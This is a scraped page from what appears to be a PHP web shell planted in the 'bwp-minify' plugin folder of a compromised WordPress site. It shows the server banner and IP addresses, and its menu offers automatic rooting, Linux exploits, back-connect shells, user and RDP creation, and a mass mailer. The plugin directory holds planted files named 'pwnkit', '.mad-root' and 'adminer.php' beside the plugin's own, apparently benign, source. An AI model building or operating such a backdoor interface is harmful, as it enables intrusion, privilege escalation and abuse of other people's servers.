Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
plugins /
bwp-minify /
[ HOME SHELL ]
Name
Size
Permission
Action
cache
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
min
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
bwp-minify-ms-interface.php
181.15
KB
-rw-r--r--
bwp-minify-ms.php
69
B
-rw-r--r--
bwp-minify.php
862
B
-rw-r--r--
bwp-minify.pot
22.49
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
15.94
KB
-rw-r--r--
screenshot-1.png
89.38
KB
-rw-r--r--
screenshot-2.png
61.91
KB
-rw-r--r--
screenshot-3.png
110.89
KB
-rw-r--r--
screenshot-4.png
80.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bwp-minify.php
<?php /* Plugin Name: Better WordPress Minify Plugin URI: http://betterwp.net/wordpress-plugins/bwp-minify/ Description: Allows you to minify your CSS and JS files for faster page loading for visitors. This plugin uses the PHP library <a href="http://code.google.com/p/minify/">Minify</a> and relies on WordPress's enqueueing system rather than the output buffer (will not break your website in most cases). This plugin is very customizable and easy to use. Version: 1.3.3 Text Domain: bwp-minify Domain Path: /languages/ Author: Khang Minh Author URI: http://betterwp.net License: GPLv3 or later */ // In case someone integrates this plugin in a theme or calling this directly if (class_exists('BWP_MINIFY') || !defined('ABSPATH')) return; // Init the plugin require_once dirname(__FILE__) . '/includes/class-bwp-minify.php'; $bwp_minify = new BWP_MINIFY();
Close